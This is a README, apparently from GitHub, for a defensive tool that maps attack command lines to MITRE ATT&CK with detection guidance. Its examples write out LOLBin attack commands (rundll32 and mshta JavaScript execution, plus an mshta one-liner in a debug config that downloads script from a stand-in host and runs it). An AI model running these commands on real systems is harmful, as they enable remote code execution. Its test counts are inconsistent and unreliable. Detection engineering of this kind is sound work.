alisonstark/OD-translator

GitHub: alisonstark/OD-translator

将攻击命令与对手技术转化为映射MITRE ATT&CK的结构化防御情报,辅助检测工程与SOC分析。

Stars: 0 | Forks: 0

# ODT - 攻防翻译器 ## 📋 目录 - [概述](#overview) - [问题陈述](#problem-statement) - [功能](#features) - [要求](#requirements) - [安装说明](#installation) - [项目结构](#project-structure) - [用法](#usage) - [示例](#examples) - [架构](#architecture) - [测试](#testing) - [使用场景](#use-cases) - [设计原则](#design-principles) - [路线图](#roadmap) - [文档](#documentation) - [项目状态](#project-status) - [免责声明](#disclaimer) ## 🎯 概述 **Offensive–Defensive Translator (ODT)** 是一个网络安全分析与增强引擎,旨在系统地将攻击性技术转换为可操作的防御性情报。其主要目标是弥合攻击者操作方式(红队/对手视角)与防御者检测、调查和响应威胁方式(蓝队/SOC 视角)之间的认知和操作差距。 ODT 专为 **SOC 分析师**、**检测工程师**、**威胁猎手**以及任何处理**攻击性安全工件**的人员设计。 该项目不仅将攻击性命令或技术视为孤立的指标,还将其置于以下背景下进行 contextualizes: - 🎯 **MITRE ATT&CK 框架** - 📊 相关**遥测源**(端点、网络、日志) - 🛡️ **防御性检测和响应考量** 输出为结构化、机器可读的格式,适用于检测工程、警报分类、威胁猎杀和教育场景。 ## 🔍 问题陈述 网络安全领域的攻击性知识非常丰富:博客、概念验证、红队报告、恶意软件分析和漏洞利用文章。然而,这些信息通常是: - 📝 非结构化的 - ⚔️ 以攻击者为中心的 - 🔌 与 SOC 团队实际监控和防御环境的方式脱节 相反,防御者通常处理警报、日志和检测,却并不完全理解其背后的原始攻击者意图或技术。 **Offensive–Defensive Translator** 通过提供一种确定性的方法,将攻击性工件转换为以防御者为中心的情报,从而解决这一不匹配问题。 ## ✨ 功能 - 🔎 **攻击性工件摄取** 分析来自各种来源的命令、LOLBins 使用和执行模式 - 🧹 **标准化与意图分析** 对原始命令进行分词、清理并提取攻击者意图 - 🎯 **MITRE ATT&CK 映射** 自动映射到 MITRE ATT&CK 战术和技术 (T1059, T1218, T1027, T1105, T1071) - 🔓 **混淆解码** 自动解码 PowerShell base64、JavaScript atob/fromCharCode 和 URL 编码 - 📈 **置信度评分** 基于证据的评分,从基线先验 (0.5) 开始,根据指标多样性和匹配质量进行调整 - 🛡️ **防御性增强** 全面的防御上下文,包括: - 检测机会 - 相关遥测源 - SOC 分析师调查笔记 - 防御性解释 - 📁 **结构化 JSON 输出** 适用于自动化、SIEM 集成和分析工作流的机器可读格式 - 🧪 **全面测试** 144 个测试(117 个单元测试 + 27 个集成/良性测试),覆盖标准化、置信度评分、检测、解码、批处理、HTML 报告和现实攻击链(100% 通过率) **当前覆盖的技术(默认全部启用):** - T1059 (命令和脚本解释器) - T1218 (系统二进制代理执行) - T1027 (混淆文件或信息) - T1105 (入口工具传输) - T1071 (应用层协议) - T1543 (创建或修改系统进程) - T1055 (进程注入) ## ⚙️ 要求 - **Python**: 3.8+ - **依赖项**: 列于 [requirements.txt](requirements.txt) ## 🧰 安装说明 ### 前置条件 确保已安装 Python 3.8+。在 Windows 上: ``` python --version # Should be 3.8 or higher ``` 在 Linux (Ubuntu/Debian) 上: ``` sudo apt install python3 python3-pip python3-venv ``` ### 设置 1. **克隆仓库**: ``` git clone cd OD-translator ``` 2. **创建虚拟环境**(推荐): ``` python -m venv venv venv\Scripts\activate # On Windows source venv/bin/activate # On Linux/macOS ``` 3. **安装依赖项**: ``` pip install -r requirements.txt ``` 4. **以开发模式安装**(推荐用于 CLI 使用): ``` pip install -e . ``` 安装后,直接使用 CLI: ``` odt --help ``` 如果 Windows 在首次运行时阻止生成的启动器: ``` Unblock-File .venv\Scripts\odt.exe ``` 要以不可编辑/系统样式为当前环境安装 `odt`: ``` pip install . ``` ## 📁 项目结构 ``` OD-translator/ ├── README.md # This file ├── TODO.md # Development tasks and roadmap ├── requirements.txt # Python dependencies ├── LICENSE # Project license │ ├── src/ # Main application directory │ ├── __init__.py │ │ │ ├── cli/ # Command-line interface │ │ ├── __init__.py │ │ └── main.py # CLI entry point │ │ │ ├── core/ # Core analysis engine │ │ ├── __init__.py │ │ ├── decoder.py # Obfuscation decoder │ │ ├── detector.py # Technique detection │ │ ├── mitre.py # MITRE ATT&CK integration │ │ ├── output.py # Output formatting │ │ ├── parser.py # Command parsing & normalization │ │ └── pipeline.py # Analysis pipeline orchestration │ │ │ └── detection/ # Detection rules & metadata │ ├── __init__.py │ ├── metadata.py # Technique metadata │ └── technique_pattern_db.py # Detection pattern database │ ├── data/ # Data storage │ ├── batch_commands/ # Batch command examples │ │ ├── batch_commands_example.csv # CSV format examples │ │ ├── batch_commands_example.json # JSON format examples │ │ └── batch_commands_example.txt # Text format examples │ ├── mitre/ # MITRE ATT&CK cache │ │ └── attackcti_t1059.json # Cached technique data │ └── results/ # Analysis output files │ └── analysis_YYYYMMDD_HHMMSS.json │ ├── tests/ # Unit test suite │ ├── __init__.py │ ├── README.md # Testing documentation │ ├── test_parser.py # Normalization tests (10 tests) │ ├── test_detector.py # Detection tests (62 tests) │ ├── test_decoder.py # Decoding tests (25 tests) │ ├── test_batch_processor.py # Batch processing tests (5 tests) │ ├── test_cli.py # CLI integration tests (3 tests) │ ├── test_report_generator.py # HTML report generation tests (12 tests) │ ├── test_realistic_commands.py # Realistic command integration test (1 test) │ └── test_benign_commands.py # Benign false-positive baseline tests (26 tests) │ ├── scripts/ # Utility scripts │ ├── build_mitre_db.py # MITRE data fetcher │ └── validate_output.py # Output validation │ └── docs/ # Additional documentation ├── changes_summary.md # Changelog and version history ├── cyber_kill_chain_mapping.md # Kill chain stages analysis └── function_flow.mmd # Function flow visualization ``` ## 🔧 用法 使用已安装的 `odt` 命令直接运行 CLI。 后备方案(未安装):`python src/cli/main.py`。 ### 快速帮助 查看所有可用选项和标志: ``` python src/cli/main.py --help # 或 python src/cli/main.py -h # 已安装的 CLI 命令 odt --help ``` ### 基本分析 分析单个命令: ``` python src/cli/main.py "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"" # 已安装的 CLI 命令 odt "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"" ``` ### 将输出保存到文件 使用 `-o` 或 `--output` 标志保存结果并自动添加时间戳: ``` python src/cli/main.py -o results.json "mshta.exe javascript:var s=new ActiveXObject('WScript.Shell');s.Run('cmd.exe /c whoami',0)" # 已安装的 CLI 命令 odt -o results.json "mshta.exe javascript:var s=new ActiveXObject('WScript.Shell');s.Run('cmd.exe /c whoami',0)" ``` 输出保存至:`data/results/results_YYYYMMDD_HHMMSS.json` ### 解码混淆命令 使用 `-d` 或 `--decode` 标志在分析前自动解码: ``` # PowerShell base64 python src/cli/main.py -d "powershell -encodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==" # JavaScript atob python src/cli/main.py --decode "mshta javascript:eval(atob('dGVzdA=='))" # 已安装的 CLI 命令 odt --decode "mshta javascript:eval(atob('dGVzdA=='))" ``` **支持的编码:** - PowerShell base64 (`-encodedCommand`, `-enc`, `-e`) - JavaScript atob/fromCharCode - URL 编码 ### 技术检测行为 默认情况下,会对每个命令评估所有支持的技术。 ### 从 Stdin 分析 ``` echo 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication"' | python src/cli/main.py # 已安装的 CLI 命令 echo 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication"' | odt ``` ### 批处理 从单个文件处理多个命令并生成一个聚合的 JSON 输出。 支持的输入格式: - `.txt`:每行一个命令 - `.csv`:第一列或 `command` 列 - `.json`:字符串数组或包含 `command` 的对象数组 ``` odt --batch-input commands.txt odt --batch-input commands.csv --batch-output triage_batch.json odt --batch-input commands.json --batch-verbose ``` 可直接运行的示例(位于 `data/batch_commands/`): ``` odt --batch-input data/batch_commands/batch_commands_example.txt --batch-output batch_from_txt.json odt --batch-input data/batch_commands/batch_commands_example.csv --batch-output batch_from_csv.json odt --batch-input data/batch_commands/batch_commands_example.json --batch-output batch_from_json.json ``` 批处理输出保存至 `data/results/` 并包含: - `batch_metadata`(计数、时间戳、持续时间) - `results`(每个命令的分析输出) - `error_details`(任何命令级别的失败) ### HTML 报告生成 为单个命令或批处理分析生成专业的 HTML 报告,包含可视化、时间线和杀伤链映射。 ``` # 单命令 HTML 报告 odt --generate-report "cmd.exe /c dir" # 批量分析 HTML 报告 odt --batch-input commands.txt --generate-report # 自定义报告输出路径 odt --generate-report --report-output my_analysis.html "powershell.exe Get-Process" ``` 报告默认保存至 `data/reports/` 并包含: **单命令报告:** - 分析的命令和标准化形式 - 检测到的 MITRE ATT&CK 技术 - 杀伤链阶段可视化 - 可展开的技术详情(模式、证据、类别) - 暗色主题的专业样式 **批处理分析报告:** - 批处理摘要(总数、已处理、错误、持续时间) - 带风险指标的时间线 - 跨所有命令的杀伤链进展 - 聚合技术覆盖表 - 每个命令的详细分析 - 错误跟踪和诊断 示例: ``` odt --batch-input data/batch_commands/batch_commands_example.json --generate-report # 创建:data/reports/batch_20260304_212915.html ``` ### PowerShell 引号技巧 PowerShell 会在 CLI 看到引号和括号之前解析它们。使用以下模式之一: **Here-string(推荐):** ``` @' mshta.exe "javascript:var p='po'+'wer'+'shell';var w=new ActiveXObject('WScript.Shell');w.Run(p+' -c echo test',0)" '@ | python src/cli/main.py ``` **使用 `--%` 停止解析:** ``` python --% src/cli/main.py mshta.exe "javascript:var p='po'+'wer'+'shell';var w=new ActiveXObject('WScript.Shell');w.Run(p+' -c echo test',0)" ``` ### 刷新 MITRE 缓存 强制刷新本地 MITRE ATT&CK 缓存: ``` python src/cli/main.py "whoami" --refresh-mitre # 已安装的 CLI 命令 odt "whoami" --refresh-mitre ``` ### 同步官方 MITRE 技术文档(离线) 将权威的 MITRE ATT&CK 技术页面下载到 `data/mitre_docs/`,包括原始 HTML 和生成的 Markdown: ``` python scripts/sync_mitre_docs.py --all-from-rules --format both ``` 这将生成: - `data/mitre_docs/html/.html` - `data/mitre_docs/markdown/.md` - `data/mitre_docs/manifest.json` ### VS Code 调试 使用此启动配置(`.vscode/launch.json`): ``` { "name": "ODT CLI (args)", "type": "debugpy", "request": "launch", "program": "${workspaceFolder}/src/cli/main.py", "console": "integratedTerminal", "redirectOutput": true, "args": [ "mshta.exe \"javascript:var r=new ActiveXObject('MSXML2.XMLHTTP');r.open('GET','https://static-example[.]net/assets/app.js',0);r.send();if(r.status==200){new Function(r.responseText)();}\"" ] } ``` ## 💡 示例 ### 示例 1:LOLBin 代理执行 **输入:** ``` rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication" ``` **输出(简化):** ``` { "input_command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"", "mitre_mapping": { "tactic": "Defense Evasion", "technique": "Signed Binary Proxy Execution", "technique_id": "T1218" }, "analysis": { "attacker_intent": "Execute malicious code via a trusted Windows binary", "execution_context": "LOLBins abuse" }, "defensive_enrichment": { "telemetry_sources": [ "Sysmon Event ID 1 (Process Creation)", "Windows Event ID 4688 (Process Creation)" ], "detection_opportunities": [ "Suspicious rundll32 command-line patterns", "Abnormal parent-child process relationships", "Rundll32 executing with javascript: protocol handler" ], "soc_notes": "Commonly used for fileless execution and phishing payloads" }, "confidence": 0.78 } ``` ### 示例 2:混淆的 PowerShell **输入:** ``` python src/cli/main.py -d "powershell -encodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==" ``` **解码后的命令:** ``` Get-Process ``` **输出包括:** - 解码后的命令文本 - T1059.001 (PowerShell) 检测 - 混淆指标 (T1027) - 针对 base64 编码命令的防御性上下文 ### 置信度评分说明 `confidence` 值 (0.0–1.0) 基于以下因素反映检测确定性: - **基线先验**:起始值为 0.5 - **证据多样性**:匹配指标的数量和种类 - **指标质量**:通用匹配 vs 特定匹配 - **行为信号**:命令链式调用、下载模式、可疑参数 - **惩罚**:过度依赖通用 token **示例评分:** - `0.9–1.0`:高置信度(多个特定指标) - `0.6–0.8`:中等置信度(部分特定 + 通用指标) - `0.3–0.5`:低置信度(主要是通用指标) ## 🏗️ 架构 项目遵循**分层架构**,以确保清晰性、可扩展性和关注点分离。 ``` ┌─────────────────────────────────────────────────┐ │ Input Layer │ │ Offensive Artifact (command/technique) │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Parsing & Normalization Layer │ │ • Tokenization │ │ • Cleanup & whitespace normalization │ │ • Intent extraction │ │ • Obfuscation decoding (if enabled) │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Analysis & Mapping Layer │ │ • Technique detection (pattern matching) │ │ • MITRE ATT&CK tactic & technique mapping │ │ • Evidence extraction │ │ • Confidence scoring │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Defensive Enrichment Layer │ │ • Detection logic explanations │ │ • Telemetry source identification │ │ • SOC investigation context │ │ • Defensive recommendations │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Output Layer │ │ Structured JSON (exportable, automatable) │ └─────────────────────────────────────────────────┘ ``` ### 层详情 #### 📥 输入层 - 通过 CLI 参数、stdin 或文件输入接受命令 - 处理具有复杂引号的多部分命令 #### 🧹 解析与标准化层 ([parser.py](src/core/parser.py)) - 标准化空格和命令结构 - 对命令组件进行分词 - 提取执行意图 - 解码混淆(PowerShell、JavaScript、URL 编码) #### 🔍 分析与映射层 ([detector.py](src/core/detector.py)) - 基于模式的技术检测 - 通过 [mitre.py](src/core/mitre.py) 映射到 MITRE ATT&CK 框架 - 基于证据的置信度评分 - 支持 T1059、T1218、T1027、T1105、T1071 技术 #### 🛡️ 防御性增强层 ([metadata.py](src/detection/metadata.py)) **这是 ODT 的核心差异化优势。** 回答关键问题: - *攻击者试图达成什么目标?* - *此活动如何在日志或遥测中体现?* - *哪些数据源与检测最相关?* - *SOC 分析师在调查期间应关注什么?* 将原始攻击者行为转换为面向防御者的情报。 #### 📤 输出层 ([output.py](src/core/output.py)) - 结构化 JSON 格式 - 带时间戳的文件输出至 `data/results/` - 适用于自动化和 SIEM 集成的机器可读格式 ### 流水线编排 [pipeline.py](src/core/pipeline.py) 模块协调所有层,确保: - **解耦**:每一层独立运作 - **可扩展性**:易于添加新技术和增强功能 - **可测试性**:无副作用的纯函数 - **可组合性**:函数返回结构化数据以供链接 ## 🧪 测试 ### 安装测试依赖项 ``` pip install -r requirements.txt ``` ### 运行针对性测试 ``` # 测试特定技术 pytest tests/test_detector.py -k "t1105 or t1071" # 测试特定函数 pytest tests/test_detector.py -k "confidence" # 详细输出 pytest tests/ -v ``` ### 运行单元测试 项目包含全面的单元测试,涵盖: - **📏 命令标准化** (10 个测试):空格处理、边界情况、特殊字符 - **📊 置信度评分** (14 个测试):基于证据的评分、奖励、惩罚、边界情况 - **🎯 技术检测** (48 个测试):T1059、T1218、T1027、T1105、T1071、T1543、T1055 检测及证据提取 - **🔓 混淆解码** (25 个测试):PowerShell base64、JavaScript atob/fromCharCode、URL 编码 - **📦 批处理** (8 个测试):CLI 批处理标志、CSV/JSON/TXT 解析、聚合输出验证 - **🔗 集成测试** (1 个测试):现实攻击链,100% 检测准确率 - **✓ 良性命令测试** (26 个测试):针对合法命令的误报基线 **总计:144 个测试(100% 通过率)** ### 良性命令误报测试 检测质量的一个关键组成部分是**在不牺牲恶意软件检测的前提下最大限度地减少误报**。 **目的:** 此测试套件针对**合法的、非恶意命令**验证检测引擎,这些命令出现在正常的 Windows/Linux 系统管理和自动化工作流中。它建立了基线误报并识别需要改进的模式。 **测试内容:** - Windows 系统管理(Windows 更新、磁盘检查、服务列表、计划任务) - 合法网络操作(DNS 查询、本地健康检查、监控) - DevOps 与自动化脚本(Docker、Git、npm、pip、Python 包) - 合法脚本操作(基本 VBScript、PowerShell 模块、批处理脚本) - 日志与监控(日志解析、文件 tail、事件日志查询) - 文件操作与备份(robocopy、压缩归档、文件复制) **预期结果:** - 大多数良性命令**不应触发检测** - 触发检测的命令应具有**低置信度** (<0.5) 或被解释为可接受的权衡 - 良性命令上的**高置信度检测** (>0.8) 表示需要改进的模式 - 中等+ 置信度检测的误报率应 <20% **权衡理念:** 为了保持恶意软件检测灵敏度,一些误报是可以接受的: - 对 `powershell -NoProfile` 的 0.45 置信度检测是可接受的噪音 - 对合法活动的 0.85 置信度检测值得调查,即使很少见 - 分析师使用置信度分数来确定调查优先级并过滤噪音 **为何重要:** - **分析师信任**:减少警报疲劳并建立对工具的信心 - **运营效率**:分析师将时间花在高信号检测上,而非误报 - **反馈循环**:记录哪些模式过于敏感并需要调整 - **防御成熟度**:反映现实世界的 SOC 工作流,其中真阳性比原始检测计数更重要 **运行良性命令测试:** ``` # 运行所有良性命令测试 pytest tests/test_benign_commands.py -v # 运行并包含详细的误报分析 pytest tests/test_benign_commands.py::test_benign_commands_false_positive_rate -v -s ``` **理解误报:** 当良性命令触发检测时,检查: 1. **置信度分数**:是可接受的噪音 (<0.5) 还是需要改进的模式? 2. **技术**:哪个 MITRE 技术被触发?是否值得承受该误报率? 3. **证据**:匹配了哪些指标?是否过于通用? 4. **上下文**:在真实的 SOC 中,分析师会关心来自合法系统的此检测吗? ### 运行所有测试 ``` pytest tests/ -v ``` ### 预期输出 ``` ============================= test session starts ============================= platform win32 -- Python 3.11.9, pytest-9.0.2, pluggy-1.6.0 collected 112 items tests/test_benign_commands.py::test_benign_windows_update_check PASSED tests/test_benign_commands.py::test_benign_get_process PASSED ... tests/test_decoder.py::test_detect_encoding_powershell_base64 PASSED ... tests/test_detector.py::test_score_confidence_zero_evidence PASSED tests/test_detector.py::test_detect_t1059_mshta_javascript PASSED tests/test_detector.py::test_detect_t1105_curl_download_output PASSED tests/test_detector.py::test_detect_t1071_http_url_in_command PASSED ... tests/test_parser.py::test_normalize_basic_whitespace PASSED tests/test_realistic_commands.py::test_realistic_commands PASSED ============================= 112 passed in 0.26s ============================== ``` ### 测试详情 每个测试通过以下方式独立验证检测功能: - 创建模拟输入数据 - 调用分析函数 - 对返回的数据结构进行断言 - 验证置信度分数和证据提取 **无副作用,无文件 I/O,纯业务逻辑测试。** 有关详细的测试文档,请参阅 [tests/README.md](tests/README.md)。 ## 🎯 使用场景 - **👩‍💻 SOC 分析师** 通过理解攻击者意图和相关遥测,改进警报分类和调查上下文 - **🔍 检测工程师** 设计基于攻击者行为的检测,并清晰映射到可观察信号 - **🎯 威胁猎手** 从已知技术转向可观察信号和遥测源 - **🎓 学生和学习者** 了解红队行动如何转化为蓝队可见性和防御操作 ## 👨‍💻 设计原则 - **🛡️ 防御者优先的心态** 输出针对蓝队使用和 SOC 工作流进行了优化 - **📊 结构化优于叙述** 机器可读格式优于散文,以利于自动化和集成 - **🔧 可扩展性** 可以增量添加新技术、输入和增强功能 - **✨ 清晰度优于完整性** 专注于可解释、实用的情报,而非详尽的覆盖 ## 🛣️ 路线图 ### 第一阶段 — 核心翻译器 ✅ (已完成) - ✅ 基于命令的输入支持 - ✅ MITRE ATT&CK 映射 (T1059, T1218, T1027, T1105, T1071) - ✅ JSON 输出模式 - ✅ 防御性增强逻辑 - ✅ 混淆解码 - ✅ 置信度评分 - ✅ 误报基线测试 ### 第二阶段 — 面向检测的扩展 🔄 (当前) - ✅ 预定义检测模式库(7 种技术,180+ 模式) - ✅ 映射到常见 EDR/SIEM 遥测(Sysmon、PowerShell、WMI 等) - ✅ 其他 MITRE 技术 (T1543, T1055) - 🔄 改进进程关系分析 - 🔄 针对持久化和注入技术的高级检测模式 ### 第三阶段 — 高级增强 - 💭 多命令之间的关联 - 💭 技术链式调用(攻击路径) - 💭 使用 ML 模型增强置信度评分 - 💭 上下文感知的威胁情报集成 ### 第四阶段 — 生态系统集成 (未来) - 🔮 SIEM 规则的导出格式 (Splunk、Elastic、Sentinel) - 🔮 类 Sigma 的检测模板 - 🔮 与威胁情报源集成 (MISP、OpenCTI) - 🔮 实时命令分析 API **图例**: ✅ 已完成 | 🔄 进行中 | 💭 计划中 | 🔮 未来 ## 📚 文档 - **[tests/README.md](tests/README.md)** - 详细的测试指南和测试结构 - **[docs/changes_summary.md](docs/changes_summary.md)** - 详细的变更日志和版本历史 - **[docs/cyber_kill_chain_mapping.md](docs/cyber_kill_chain_mapping.md)** - 网络杀伤链分析:技术如何映射到攻击阶段 - **[docs/function_flow.mmd](docs/function_flow.mmd)** - 函数流程的 Mermaid 图 - **[sample_commands.md](sample_commands.md)** - 用于测试的示例攻击性命令 - **[data/mitre_docs/README.md](data/mitre_docs/README.md)** - 离线 MITRE ATT&CK 文档同步工作流 ## 🚧 项目状态 本项目处于**积极开发中**,旨在随着作者专注于以下领域而不断演进: - SOC 运营 - 检测工程 - 蓝队工作流 - 威胁猎杀方法论 **欢迎贡献、想法和批评性反馈!** ## ⚠️ 免责声明 本项目严格用于**防御、教育和研究目的**。 **ODT 不:** - 启用或促进恶意活动 - 提供漏洞利用工具或武器化载荷 - 鼓励未经授权的系统访问 **ODT 旨在:** - ✅ 改善防御性安全运营 - ✅ 教育安全专业人员了解攻击者技术 - ✅ 支持检测工程和威胁猎杀 - ✅ 弥合攻击性与防御性网络安全之间的差距 请负责任且合乎道德地使用。 ## 📄 许可证 详情请参阅 [LICENSE](LICENSE) 文件。 ## 🙏 致谢 - **MITRE ATT&CK** - 提供全面的对手战术和技术框架 - **安全研究社区** - 分享为防御实践提供信息的攻击性技术
**由防御者 🛡️ 为防御者构建**
标签:CISA项目, Cloudflare, CSV导出, DNS 解析, Homebrew安装, IP 地址批量处理, MITRE ATT&CK, Web报告查看器, 后端开发, 后端开发, 命令分析, 子域名变形, 子域枚举, 安全运营, 情报转换, 扫描框架, 攻击技战术, 攻击模拟, 数据展示, 文档结构分析, 紫队, 红队, 网络安全, 网络调试, 自动化, 逆向工具, 遥测数据, 防御策略, 隐私保护, 驱动签名利用